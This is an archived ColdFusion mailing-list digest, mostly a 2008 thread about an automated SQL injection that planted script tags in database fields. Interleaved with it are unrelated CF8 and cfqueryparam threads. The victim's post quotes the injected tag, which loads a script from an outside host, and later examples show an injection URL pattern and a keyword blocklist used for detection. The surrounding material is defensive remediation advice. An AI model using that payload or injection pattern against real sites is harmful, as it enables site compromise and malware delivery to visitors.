HELP! SQL Injection Attack!
I'm a ColdFusion noob and my database just got injected with some script. So for example one of the database fields would appear something like so: Gisella427.jpg</title><script src=http://jjmaoduo.3322.org/csrss/w.js></script><!-- I've tried updating the records using a replace command on the fields, but 20 mins later this code pops up again!!! Any idea on how to fix or prevent this from happening? Seriously out of ideas here. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310330 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: HELP! SQL Injection Attack!
There are a number of things you can do, and in fact I use all of these:

[A] Find out this person's IP address, and if the form is submitted from that IP address, do nothing. Don't give them any kind of feedback at all. That'll stop this current attack, but since these idiots usually dart from one IP address to another, it's not enough to fix the problem; it only stops today's. You can find out the IP address by having your form submit #cgi.remote_addr# in a hidden field.

[B] Pass the form's submitted contents through a regex to eliminate any HTML. You can get all kinds of string manipulation scripts through the library at cflib.org, including one to strip out any HTML.

[C] Use cfformprotect, which (amongst other things) compares the submission in this form with a database of other form submissions from other sites, identifying which ones are spam and which aren't. When it tells you this is spam, you just throw it away. Don't tell the spammer you're throwing it away, because that only helps them refine their techniques. Those buggers are agile enough as it is without us giving them a helping hand. You can get cfformprotect from http://www.riaforge.org/ .

[D] While you're working in this area, you should make sure you're using cfqueryparam if you're processing the form into your database. I know you haven't described a SQL injection, but it's not a million miles away from what you do describe. There's ample documentation in the ColdFusion docs about cfqueryparam and there have been quite a few blog articles about it lately. Google for cfqueryparam and ColdFusion and you'll find them. Use cfqueryparam on every (and I do mean EVERY) parameter you insert into the database, on every insert or update if there is likely to be any user input going in that SQL statement. That ensures that you won't get anyone able to enter a last name as 'Smith)';drop table users' or some such.
I started defending my sites from this kind of script when I had a guestbook on a very low volume site suddenly get 30,000 entries waiting for editor approval, all with links to sites we might want to go and see, just like yours has. Using the techniques I described reduced the flow from thousands a day to a more likely 3-4 a week on this little site. Hope this helps. Cheers Mike Kear Windsor, NSW, Australia Adobe Certified Advanced ColdFusion Developer AFP Webworks http://afpwebworks.com ColdFusion, PHP, ASP, ASP.NET hosting from AUD$15/month
Re: HELP! SQL Injection Attack!
It appears we've been attacked by this last night / this morning too. Will update here with more info when we have it. Dominic
Re: XMLSearch not thread safe
On Wednesday 06 Aug 2008, Brad Wood wrote: iframes aren't good for load testing. Browsers like IE follow spec and only allow 2 concurrent connections to a server at once. Even IE lets you adjust this number in the registry, but I use Apache JMeter tbh. -- Tom Chiverton This email is sent for and on behalf of Halliwells LLP. Halliwells LLP is a limited liability partnership registered in England and Wales under registered number OC307980 whose registered office address is at Halliwells LLP, 3 Hardman Square, Spinningfields, Manchester, M3 3EB. A list of members is available for inspection at the registered office. Any reference to a partner in relation to Halliwells LLP means a member of Halliwells LLP. Regulated by The Solicitors Regulation Authority. CONFIDENTIALITY This email is intended only for the use of the addressee named above and may be confidential or legally privileged. If you are not the addressee you must not read it and must not use any information contained in nor copy it nor inform any person other than Halliwells LLP or the addressee of its existence or contents. If you have received this email in error please delete it and notify Halliwells LLP IT Department on 0870 365 2500. For more information about Halliwells LLP visit www.halliwells.com.
Re: weird CF8 behavior
On Wednesday 06 Aug 2008, jw wrote: Has anyone ever encountered a weird issue where you get CF file not found errors for Application.cfc or index.cfm when they are clearly part of the application? I get this on my production server and turning off template caching solves the problem, though not really a great solution. Maybe you need to raise the ulimit (or whatever MacOS has renamed that part of *nix to). -- Tom Chiverton
Mac Users Beware! - Security Update 2008-005 (Intel) stopped Apache talking to CF8
Yesterday I installed Security Update 2008-005 (Intel) on my MacBook Pro and Apache wouldn't talk to ColdFusion 8 any more! I'm not Mac savvy enough to understand why, but it had something to do with paths. Symptoms were very confusing and caused many hours of head scratching. It wasn't starting Apache from its application root folder. (I still have Apache 1.3, which came installed with OSX 10.4, hanging around the system.) Something to do with my setup caused it not to load the httpd.conf file properly (and possibly envvars?)! It seemed to be loading it, although I think it was loading other conf files first, which I think caused it not to load the jrun module. I could still get to my virtual hosts, but just saw cfm files as plain text! This was my fix anyway. I changed my startup script from: sudo /apache2/bin/apachectl start to: cd /apache2/bin sudo ./apachectl start That fixed it. I would love to know the root cause. I understand that my fix explicitly starts Apache2 from its application root and therefore it finds all its resources correctly. I don't understand what changed on my system. If anyone could help me solve what happened that would be great. The pain of losing several hours will be easier to bear if I actually learn something from it. Thanks, Matt
Re: HELP! SQL Injection Attack!
On Thursday 07 Aug 2008, Dominic Watson wrote: It appears we've been attacked by this last night / this morning too. Various people have been warning in the last few weeks that this sort of scatter gun approach that started with ASP-based sites is now migrating to ColdFusion powered ones. -- Tom Chiverton
Re: HELP! SQL Injection Attack!
Yes, I alerted my bosses to this at the time and unfortunately nothing was done - we were too pressed for time. We now have 4 people going through the site patching up all the vulnerable queries. Dominic
RE: help!! = ColdFusion.Window.create Refresh
Torsten, This was an issue and has been fixed in 8.0.1. I did a quick check on it and it works fine for me. Are you on 8.0.1? Charlie, Make sure that you use the right case when you use refreshOnShow in JavaScript as JS is case sensitive. Can you share the code that does not seem to work? -Original Message- From: Charlie Griefer [mailto:[EMAIL PROTECTED] Sent: Thursday, August 07, 2008 9:19 AM To: CF-Talk Subject: Re: help!! = ColdFusion.Window.create Refresh i'd heard (on this list) that as of 8.01, refreshonshow worked for cfwindows created via the create method... but i've not been able to get it to work :\ my workaround was to pass a unique value to the js function that created the window, and use that as the window name. On Wed, Aug 6, 2008 at 8:43 PM, Shirzad Khusrokhan [EMAIL PROTECTED] wrote: I can't get windowOptions.refreshOnShow = true; to work either. Does anyone have a workaround?
Re: HELP! SQL Injection Attack!
On Thursday 07 Aug 2008, Dominic Watson wrote: Yes, I alerted my bosses to this at the time and unfortunately nothing was done - we were too pressed for time. We now have 4 people going through the site patching up all the vulnerable queries. It's sad but true that security holes are never seen as important until it's (almost) too late. -- Tom Chiverton
RE: HELP! SQL Injection Attack!
I konw you havent described a SQL injection ... No, that's exactly what he described. The attack appends JavaScript to character fields. And, unfortunately, blocking specific IP addresses won't get you very far here, because it's a random, automated attack run from compromised hosts in a botnet, I think. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information!
RE: HELP! SQL Injection Attack!
Use CFQUERYPARAM around all user-submitted query values. http://www.adobe.com/devnet/coldfusion/articles/cfqueryparam.html This specific issue came up on the list repeatedly over the last few weeks, so you might want to check the list archives. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/
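As an added example (not code from Mike's or Dave's posts, and not the original poster's application): the update a photo-title form might run, first written the way that gets hit by this attack and then with cfqueryparam as Mike's point [D] and Dave's reply recommend. The datasource name "site", the table "photos" and its columns are assumed for the illustration.

```cfml
<!--- Added example, not from the thread. Datasource "site", table "photos"
      and its columns are assumed names. --->

<!--- Vulnerable form: the values are pasted straight into the SQL text.
      ColdFusion doubles any single quote inside #form.title#, so the quoted
      string is not the easy target; the unquoted numeric id is. A request
      such as
        ?id=12;UPDATE photos SET title=title+'<script src=...></script>'--
      becomes a second statement that runs against every row, which is the
      shape of the attack the thread describes. --->
<cfquery datasource="site">
    UPDATE photos
    SET    title = '#form.title#'
    WHERE  id = #url.id#
</cfquery>

<!--- Hardened form: every user-supplied value is bound as a typed
      parameter, so the database never parses it as SQL. The id must be an
      integer, and the title cannot exceed the column width. --->
<cfquery datasource="site">
    UPDATE photos
    SET    title = <cfqueryparam cfsqltype="cf_sql_varchar"
                                 value="#form.title#"
                                 maxlength="100">
    WHERE  id = <cfqueryparam cfsqltype="cf_sql_integer"
                              value="#url.id#">
</cfquery>
```

With cf_sql_integer bound, a value like 12;UPDATE... is rejected by ColdFusion with a type error before any SQL reaches the database, and maxlength makes ColdFusion reject a value longer than the column instead of sending it. Cleaning the rows with REPLACE, as the original poster did, does nothing for the hole itself, which is why the script tag came back twenty minutes later.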
Re: HELP! SQL Injection Attack!
Well, as I said, the answer to this (as it is for a lot of things on the web) is not one but a combination of tactics. The ban IP thing might not be the bee's knees for this but it sure helps with the kind of thing I THOUGHT he was describing. I've been able to almost eliminate spam entries from my guestbook/contact us forms (ok I haven't almost eliminated, let's say dramatically reduced then) across my sites. On one client's site for example, their guestbook was choking to death with thousands of entries all spam, and now it's fewer than 5-6 spam entries a month. I have a database of 9600 or so IP addresses that I won't accept input from on any of my sites. As time goes on it gets more and more effective. Anyway, whatever solves Michael's problem I feel sure is going to be a combination of things, not just the one. Cheers Mike Kear Windsor, NSW, Australia Adobe Certified Advanced ColdFusion Developer AFP Webworks http://afpwebworks.com ColdFusion 8 Ent, PHP 4 and 5, ASP, ASP.NET hosting from AUD$15/month
Re: HELP! SQL Injection Attack!
On Thursday 07 Aug 2008, Dave Watts wrote: Use CFQUERYPARAM around all user-submitted query values. And htmlEditFormat() around places where database data is output to the end user. -- Tom Chiverton
RE: HELP! SQL Injection Attack!
If you have the option, that'd be much more efficient at the network level than in the app and would filter the IPs for all apps at once. It might get more 'effective' the larger it gets but it also gets less efficient. The solution is to filter all input from users with something like cfqueryparam. The only reason to combine that with another solution is to filter data that made it in already... and like Tom said, simply formatting the data with htmledit on display will render the script/html as useless plain text. Not to get on a rant either but... 5-6 successful spam submissions per month is 5-6 too many in my opinion. There are too many simple solutions to 99.9% of them. It used to be that 1 would send a developer on a frenzied mission to stop it; now they are so abundant that people are becoming ok with 5 or 6 a month? Come on... if you don't filter your user content, the terrorists win. ;-) ..:.:.:.:.:.:.:.:.:.:. Bobby Hartsfield http://acoderslife.com http://cf4em.com
Last chance to sign up for Hands On CSS Class
4 DAY HANDS ON CSS CLASS August 18-21st, 2008, Fairfax Virginia. Cost $1,399 per person. Do you want to learn about CSS? Are you someone who is just getting started with CSS who is finding it incredibly frustrating? Or someone who has used it for a while, but still can't get positioning and floating behaviors to do what you want? I can help you. This 4 day class is given from a programmer's perspective rather than a designer's. It's meant to let you understand why things happen the way they do rather than simply "Oooh, see how pretty I can make it." Learn the 9 rules of Floats, the differences in the positioning models, how using inline display types is different from floats. Learn about typography and cross browser issues. I do not give this class very often publicly. Chances are if you miss this class I will not be giving it for at least a year. If you are interested in this class, email me. A copy of the syllabus is located at: http://www.shayna.com/index.cfm?fuseaction=training.syllabus_displayid=1 I accept paypal, corporate checks and money orders/cashiers checks. Sandra Clark = http://www.shayna.com Training and Consulting in CSS and Accessibility Team Fusebox
Re: Java Book Recommendations?
Will, Definitely check out Java for ColdFusion developers by Eben Hewitt. By far the easiest book for a CF'er to grasp Java. Rick Mason Thanks much Rick! I'll check it out! Will
Re: HELP! SQL Injection Attack!
On Thursday 07 Aug 2008, Bobby Hartsfield wrote: The solution is to filter all input from users with something like cfqueryparam. The only reason to combine that with another solution is to filter data that made it in already... and like Tom said, Ahh, no, not the only reason. Suppose I enter JavaScript as my 'name' in a blog comment form. cfqp will let that pass (it's text, in a text field, with a text cf_sql_type) but you still want to htmlEditFormat() on output. -- Tom Chiverton
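As an added example of Tom's point (not code from the original posts): a comment form whose insert is already parameterised with cfqueryparam, followed by the stored name rendered with and without htmlEditFormat(). Datasource "site", table "comments" and the column names are assumed.

```cfml
<!--- Added example, not from the thread. Datasource "site", table
      "comments" and its columns are assumed names. --->

<!--- The insert is safe against SQL injection: both values are bound as
      typed parameters. But a name submitted as
        <script src=http://example.invalid/w.js></script>
      is a perfectly valid varchar, so it is stored exactly as typed. --->
<cfif structKeyExists(form, "name") and structKeyExists(form, "body")>
    <cfquery datasource="site">
        INSERT INTO comments (author_name, body)
        VALUES (
            <cfqueryparam cfsqltype="cf_sql_varchar"
                          value="#form.name#" maxlength="80">,
            <cfqueryparam cfsqltype="cf_sql_varchar"
                          value="#form.body#" maxlength="2000">
        )
    </cfquery>
</cfif>

<cfquery name="q" datasource="site">
    SELECT author_name, body
    FROM   comments
    ORDER  BY id DESC
</cfquery>

<cfoutput query="q">
    <!--- Unsafe: the stored tag reaches the browser intact, which loads
          and runs the remote script for every visitor. --->
    <p class="unsafe">#q.author_name#</p>

    <!--- Safe: htmlEditFormat() turns < > & and " into entities, so the
          browser shows the text of the tag instead of executing it. --->
    <p class="safe">#htmlEditFormat(q.author_name)#</p>
    <p>#htmlEditFormat(q.body)#</p>
</cfoutput>
```

htmlEditFormat() leaves the single quote alone, so it covers text between tags and values inside double-quoted attributes, but not a value dropped into a single-quoted attribute or into a JavaScript string; those contexts need their own encoding. Encoding at output also neutralises script that is already sitting in the tables from the attack, which is the "data that made it in already" Bobby mentions.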
Re: Newb AJAX question
Thanks Tom, my JS is really weak... can you point me to some resources online that would walk me through this?

Bret

> On Tuesday 29 Jul 2008, Bret McDermitt wrote:
> > right on the money. If I could generate that key based on the domain name being passed to my server using AJAX and then send that to the iframe src, that'd be perfect.
>
> Have the JavaScript on the host request a token from your server, combine it with their IP/domain name, and send it along with the IFRAME URL?
>
> --
> Tom Chiverton

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310348
RE: HELP! SQL Injection Attack!
Michael,

I have about 5 posts on this issue: http://www.coldfusionmuse.com

Starting with this one... http://www.coldfusionmuse.com/index.cfm/2008/7/18/Injection-Using-CAST-And-ASCII

There's no magic bullet. The basic procedure is going to be to implement a blacklist function to prevent the attack (this is a first level defense to give you some breathing room), restore your DB or fix it with one of the several scripts running around, then go through your code and examine all the queries and add cfqueryparam, then look at where you are handling form inputs and validate what users have given you, then work on scrubbing anything that is given by the user that is output to the page (to prevent xss). Basically, other than the blacklist function (about which there are a variety of opinions) all of these steps ought to be followed regularly as your de facto coding standard.

-Mark

-Original Message-
From: Mike Kear [mailto:[EMAIL PROTECTED]
Sent: Thursday, August 07, 2008 6:36 AM
To: CF-Talk
Subject: Re: HELP! SQL Injection Attack!

Well, as I said, the answer to this (as it is for a lot of things on the web) is not one but a combination of tactics. The ban ip thing might not be the bees knees for this but it sure helps with the kind of thing I THOUGHT he was describing. I've been able to almost eliminate spam entries from my guestbook/contact us forms (ok I haven't almost eliminated, let's say dramatically reduced then) across my sites. On one client's site for example, their guestbook was choking to death with thousands of entries all spam, and now it's fewer than 5-6 spam entries a month. I have a database of 9600 or so ip addresses that I won't accept input from on any of my sites. As time goes on it gets more and more effective. Anyway, whatever solves Michael's problem I feel sure is going to be a combination of things, not just the one.

Cheers
Mike Kear
Windsor, NSW, Australia
Adobe Certified Advanced ColdFusion Developer
AFP Webworks
http://afpwebworks.com
ColdFusion 8 Ent, PHP 4 and 5, ASP, ASP.NET hosting from AUD$15/month

On Thu, Aug 7, 2008 at 9:20 PM, Dave Watts [EMAIL PROTECTED] wrote:
> > I know you haven't described a SQL injection ...
>
> No, that's exactly what he described. The attack appends JavaScript to character fields. And, unfortunately, blocking specific IP addresses won't get you very far here, because it's a random, automated attack run from compromised hosts in a botnet, I think.
>
> Dave Watts, CTO, Fig Leaf Software
> http://www.figleaf.com/

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310349
RE: HELP! SQL Injection Attack!
> Anyway, whatever solves the Michael's problem I feel sure is going to be a combination of things, not just the one.

Actually, with this particular SQL injection attack it's really easy to stop. We created a SQL filter that is called from application.cfm. It loops through the URL structure and checks to see if any URL variables contain both a semi-colon and any SQL keyword. If a match is found, it just cfaborts the request and sends us an e-mail with the details. We periodically review those messages and have not found a single false-positive yet after deployment to every site we manage.

Granted, it will not stop SQL injection through form posts, but I don't recall ever seeing a SQL injection attack through a form post (yet). At the least it can put an immediate stop to the current flood and give you time to implement other protective measures such as cfqueryparam, etc.

We have CF5 and CFMX versions if anyone wants a copy.

-Justin Scott

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310350
Re: HELP! SQL Injection Attack!
Various people have been warning in the last few weeks that this sort of scatter gun approach that started with ASP-based sites is now migrating to ColdFusion powered ones. And it is growing up. Yesterday, my bad bot closed the door to about 50 attacks, and this morning I have 60 reported. Usually I get around 5 only each night.

--
___
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: [EMAIL PROTECTED])
Thanks.

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310351
Re: HELP! SQL Injection Attack!
> We have CF5 and CFMX versions if anyone wants a copy.

I really see having several layers of protection to effectively stop this sort of thing. Something at the application level sounds like a good first line of defense. I'd be interested in seeing this.

Thanks

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310352
Re: HELP! SQL Injection Attack!
We handled this attack last month (it never did get through), and starting Tuesday night received about 20 thousand instances (not an exaggeration). Slowing down now for us, but, heh, it's early.

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310353
Re: HELP! SQL Injection Attack!
> blocking specific IP addresses won't get you very far here, because it's a random.

Blocking IP addresses won't prevent injection in your database if it is not protected, but if an attack is detected at the very first attempt, it will save thousands of useless HTTP requests on your sites, because these robots will scan everything they find.

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310354
RE: HELP! SQL Injection Attack!
Claude, could you possibly share your code that stores the bad IP addresses for a period of time to prevent these useless http requests?

Thanks,
CV.

-Original Message-
From: Claude Schneegans [mailto:[EMAIL PROTECTED]
Sent: Thursday, August 07, 2008 9:53 AM
To: CF-Talk
Subject: Re: HELP! SQL Injection Attack!

> blocking specific IP addresses won't get you very far here, because it's a random.

Blocking IP addresses won't prevent injection in your database if it is not protected, but if an attack is detected at the very first attempt, it will save thousands of useless HTTP requests on your sites, because these robots will scan everything they find.

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310355
Re: HELP! SQL Injection Attack!
I'd like to know how I can stop the requests from ever hitting the web-server. Can anyone point me at a resource for a firewall solution? I've seen some isapi filter solutions, but they all seem to just clean the querystring and then forward the request on -- so it's still hitting CF. I'd really like to stop it before we get to the web-server at all (let alone the CF application server).

Cheers,
Kris

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310356
Re: HELP! SQL Injection Attack!
> Tuesday night received about 20 thousands instances (not an exaggeration). Slowing down now for us, but, heh, it's early.

This is where banning IPs at the first attempt will reduce this pollution. If the attack is detected at the first attempt, and the address banned, the statistics will show only one request per IP address. Otherwise, you will allow the bot to open all your pages, archives, etc. and your server may choke.

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310357
Re: HELP! SQL Injection Attack!
> No, that's exactly what he described. The attack appends JavaScript to character fields. And, unfortunately, blocking specific IP addresses won't get you very far here, because it's a random, automated attack run from compromised hosts in a botnet, I think.

Yea I think it is too. I started tracking ip's on a page that I saw always showing up in FusionReactor. This morning I am up to 378 ip addresses blocked within the last three days. I started out by emailing myself the ip address thinking it would only be a few ips. I cannot believe how bad the issue is...

-Randy

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310358
Re: Installation of CF 8 (developer edition) is not working
> Interesting. To confirm, you are on Windows XP, right?

Yes, I am on XP.

> I expected to see an error message output. If you have reinstalled CF8 (without encountering any errors)

I just reinstalled this morning and I DID encounter an error, but when I look in the log it says everything was installed successfully. What the install DID tell me was that port 8500 was in use, so port 8501 was used.

> Is Windows configured to show hidden and system files and folders?

I'll look again at those folders and see if I can see them now.

> Are you choosing a custom installation directory? (Anything other than C:\ColdFusion8\)

Nope.

> And just to confirm once again, are you using the built in web server option, NOT IIS or Apache?

Using built in web server.

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310359
Re: HELP! SQL Injection Attack!
> Claude, could you possibly share your code that stores the bad IP addresses for a period of time to prevent these useless http requests? Thanks, CV.

Well, I'd be happy to, but it is a rather complete and complicated system. It works for all sites/domains on the CF server, uses a database, and is mainly oriented toward bad and unwanted bots elimination. The spam and SQL injection detection is only a small part of it.

I can give you this part of code which detects illegal url parameters. The idea is simply to 1. detect if an url parameter is invalid and, 2. if yes, check if there is anything evil in it. In the first case, the request is simply ignored, in the second case, the IP is banned.

This code will check if the parameter id is a numeric value:

    <CFIF val(id) EQ 0 AND (id CONTAINS "http" OR id CONTAINS "user" OR id CONTAINS "declare" OR id CONTAINS "exec")>
        ... ban this IP address
        <CFABORT>
    <CFELSE>
        <CFSET id = val(id)>
    </CFIF>

You may include this code in any page depending on some numeric parameter, or better: make it a custom tag or CFC.

For text parameters, like page names, etc. I simply use:

    <CFIF pTexte CONTAINS "http" OR pTexte CONTAINS "user" OR pTexte CONTAINS "declare" OR pTexte CONTAINS "exec">

For text fields in forms filled by users, a more precise analysis would be needed, but I have none of these on my sites. No one can enter anything if he is not registered.

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310360
Re: HELP! SQL Injection Attack!
> I'd like to know how I can stop the requests from ever hitting the web-server.

If you detect the attack at the first request, and block the IP, the bot will not even get the first page, will not see all links in it, and will not search your entire server.

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310361
RE: HELP! SQL Injection Attack!
Thanks. I was hoping to find an elegant solution that stored the IPs in the application scope for the length of the session timeout and then gracefully removed the banned IPs once the session timed out. I have an idea on what to do, but was looking for a little guidance as I am new to app.cfc and all of its methods.

Regards,
CV.

-Original Message-
From: Claude Schneegans [mailto:[EMAIL PROTECTED]
Sent: Thursday, August 07, 2008 10:14 AM
To: CF-Talk
Subject: Re: HELP! SQL Injection Attack!

> Claude, could you possibly share your code that stores the bad IP addresses for a period of time to prevent these useless http requests? Thanks, CV.

Well, I'd be happy to, but it is a rather complete and complicated system. It works for all sites/domains on the CF server, uses a database, and is mainly oriented toward bad and unwanted bots elimination. The spam and SQL injection detection is only a small part of it.

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310362
CFQueryparam and NULLs.
Quick question: How would I rewrite this using the built in NULL feature of cfqueryparam? You don't use YesNoFormat with integers, correct?

    <cfif len(trim(form.makeid))><cfqueryparam value="#trim(form.makeid)#" cfsqltype="cf_sql_integer"><cfelse>null</cfif>

Thanks,
Che

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310363
Re: HELP! SQL Injection Attack!
> I was hoping to find an elegant solution that stored the Ips in the application scope for the length of the session timeout and then gracefully removed the banned Ips once the session timed out.

How about doing this:

- Create a server scope array or list (if you have several sites), or just in the application scope.
- Add to the array any banned IP.
- Delete the first element in the array (the oldest), if its length is over a certain maximum, based on the idea that the bot is probably operating from an innocent infected PC and will not be a threat for months, so it is not useful to memorize banned addresses for ever.
- The length of the array you will keep depends on the amount of attacks you are receiving each day; about 100 or so sounds reasonable.
- In your application.cfm, simply check if cgi.REMOTE_ADDR is in the list of banned addresses and CFABORT if yes.

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310364
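One way to put Justin's URL filter, Claude's numeric-parameter check and Claude's bounded ban list together in a single Application.cfm, as an added example (not the code of anyone in the thread). The keyword list, the name application.bannedIPs and the cap of 100 entries are assumptions, the cap following the size Claude suggests.

```cfml
<!--- Application.cfm request filter. Added example, not code from the thread.
      Assumes: application.bannedIPs (a comma list kept in the application
      scope), a cap of 100 entries, and the keyword lists below. --->
<cfapplication name="myApp" applicationtimeout="#createTimeSpan(1,0,0,0)#">

<cfset maxBanned = 100>

<!--- 1. Refuse a banned client before any page logic or SQL runs (Claude's
      last step). The list is created on first use inside the same lock. --->
<cflock scope="application" type="exclusive" timeout="5">
    <cfif NOT structKeyExists(application, "bannedIPs")>
        <cfset application.bannedIPs = "">
    </cfif>
    <cfset isBanned = listFind(application.bannedIPs, cgi.REMOTE_ADDR) GT 0>
</cflock>
<cfif isBanned>
    <cfabort>
</cfif>

<!--- 2. Justin's rule: a URL value that carries both a semicolon and a SQL
      keyword is treated as an attack. Keyword list is an assumption; review
      the mails it generates for false positives, as Justin does. --->
<cfset sqlKeywords = "declare,exec,cast,select,insert,update,delete,drop">
<cfset attackFound = false>
<cfloop collection="#url#" item="key">
    <cfset value = lCase(url[key])>
    <cfif value CONTAINS ";">
        <cfloop list="#sqlKeywords#" index="word">
            <cfif value CONTAINS word>
                <cfset attackFound = true>
            </cfif>
        </cfloop>
    </cfif>
</cfloop>

<!--- 3. Claude's rule for a parameter that must be numeric: a non-numeric id
      that also carries one of his marker words is an attack; anything else
      is coerced with val() so only a number can reach a query. --->
<cfif structKeyExists(url, "id")>
    <cfif val(url.id) EQ 0 AND reFindNoCase("http|user|declare|exec", url.id)>
        <cfset attackFound = true>
    <cfelse>
        <cfset url.id = val(url.id)>
    </cfif>
</cfif>

<!--- 4. On detection: record the address, drop the oldest entry once the
      list is over the cap (the infected PC will not be a threat for months,
      so the list need not grow for ever), then abort with no response body.
      Justin additionally mails himself the details at this point. --->
<cfif attackFound>
    <cflock scope="application" type="exclusive" timeout="5">
        <cfif NOT listFind(application.bannedIPs, cgi.REMOTE_ADDR)>
            <cfset application.bannedIPs =
                listAppend(application.bannedIPs, cgi.REMOTE_ADDR)>
            <cfif listLen(application.bannedIPs) GT maxBanned>
                <cfset application.bannedIPs =
                    listDeleteAt(application.bannedIPs, 1)>
            </cfif>
        </cfif>
    </cflock>
    <cfabort>
</cfif>
```

Behind a reverse proxy or load balancer cgi.REMOTE_ADDR is the proxy's address, so a ban there would lock out every client it fronts. As Dave says, this only cuts the request flood; the queries themselves still need cfqueryparam.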
RE: CFQueryparam and NULLs.
If FORM.makeID is either zero or a number:

    <cfqueryparam value="#trim(form.makeid)#" cfsqltype="cf_sql_integer" null="#NOT FORM.makeID#">

Maybe throw in a Trim in the null= too.

Adrian

-Original Message-
From: Che Vilnonis [mailto:[EMAIL PROTECTED]
Sent: 07 August 2008 15:47
To: CF-Talk
Subject: CFQueryparam and NULLs.

Quick question: How would I rewrite this using the built in NULL feature of cfqueryparam? You don't use YesNoFormat with integers, correct?

    <cfif len(trim(form.makeid))><cfqueryparam value="#trim(form.makeid)#" cfsqltype="cf_sql_integer"><cfelse>null</cfif>

Thanks,
Che

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310365
RE: CFQueryparam and NULLs.
Here is how I do it.

    <cfqueryparam cfsqltype="CF_SQL_INTEGER" value="#trim(form.makeid)#" null="#IsNull(form.makeid)#" />

IsNull is a function I wrote to check if the value is blank.

-Original Message-
From: Che Vilnonis [mailto:[EMAIL PROTECTED]
Sent: Thursday, August 07, 2008 7:47 AM
To: CF-Talk
Subject: CFQueryparam and NULLs.

Quick question: How would I rewrite this using the built in NULL feature of cfqueryparam? You don't use YesNoFormat with integers, correct?

    <cfif len(trim(form.makeid))><cfqueryparam value="#trim(form.makeid)#" cfsqltype="cf_sql_integer"><cfelse>null</cfif>

Thanks,
Che

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310366
RE: CFQueryparam and NULLs.
I always use:

    null="#NOT len(trim(form.whatever))#"

as that catches everything.

Dave

-Original Message-
From: Adrian Lynch [mailto:[EMAIL PROTECTED]
Sent: Thursday, August 07, 2008 9:55 AM
To: CF-Talk
Subject: RE: CFQueryparam and NULLs.

If FORM.makeID is either zero or a number:

    <cfqueryparam value="#trim(form.makeid)#" cfsqltype="cf_sql_integer" null="#NOT FORM.makeID#">

Maybe throw in a Trim in the null= too.

Adrian

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310367
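An added example (not from anyone in the thread) tying the two remediation points together: the unquoted numeric position that the attack abuses, the same query with every value bound by cfqueryparam using the null attribute from the NULLs thread, and htmlEditFormat() on output as Tom points out in the injection thread. The table, column and datasource names are assumptions.

```cfml
<!--- Added example, not from the thread. Assumes a table "vehicles" with
      columns id (int), notes (varchar) and makeid (nullable int), a
      datasource "myDSN", and a form posting notes plus an optional makeid. --->

<!--- BEFORE: url.id dropped straight into SQL. ColdFusion doubles single
      quotes inside quoted string literals in a cfquery, but an unquoted
      numeric position gets no such treatment, which is why this attack
      aims at numeric parameters. Shown commented out; do not use. --->
<!---
<cfquery datasource="myDSN">
    UPDATE vehicles SET notes = '#form.notes#' WHERE id = #url.id#
</cfquery>
--->

<!--- AFTER: every value is a bound parameter. cf_sql_integer rejects
      anything that is not a number before the statement reaches the
      database; null="" turns an empty optional field into SQL NULL (Dave's
      pattern); maxlength caps the text column. --->
<cfquery datasource="myDSN">
    UPDATE vehicles
    SET notes  = <cfqueryparam value="#trim(form.notes)#"
                               cfsqltype="cf_sql_varchar" maxlength="2000">,
        makeid = <cfqueryparam value="#trim(form.makeid)#"
                               cfsqltype="cf_sql_integer"
                               null="#NOT len(trim(form.makeid))#">
    WHERE id   = <cfqueryparam value="#url.id#" cfsqltype="cf_sql_integer">
</cfquery>

<!--- OUTPUT: cfqueryparam says nothing about what stored text means once it
      is in a page. Script that was accepted as plain text (or was already in
      the table before the fix) is neutralised by encoding on the way out. --->
<cfquery name="q" datasource="myDSN">
    SELECT id, notes, makeid FROM vehicles
    WHERE id = <cfqueryparam value="#url.id#" cfsqltype="cf_sql_integer">
</cfquery>
<cfoutput query="q">
    <p>Vehicle #htmlEditFormat(id)#: #htmlEditFormat(notes)#</p>
</cfoutput>
```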
Re: HELP! SQL Injection Attack!
Claude Schneegans wrote:
> - In your application.cfm, simply check if cgi.REMOTE_ADDR is in the list of banned addresses and CFABORT if yes.

Just throwing out a random thought that occurred to me when I read this. If one cares to be a little nicer and proactive, maybe throw up a very simple and basic "Your system appears to be infected with a bot and it is currently banned from accessing this site..." or something to that effect. The idea being maybe some of the poor souls may learn something. But only if one cares to do so.

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310368
Productizing a Coldfusion web app, question
Hello,

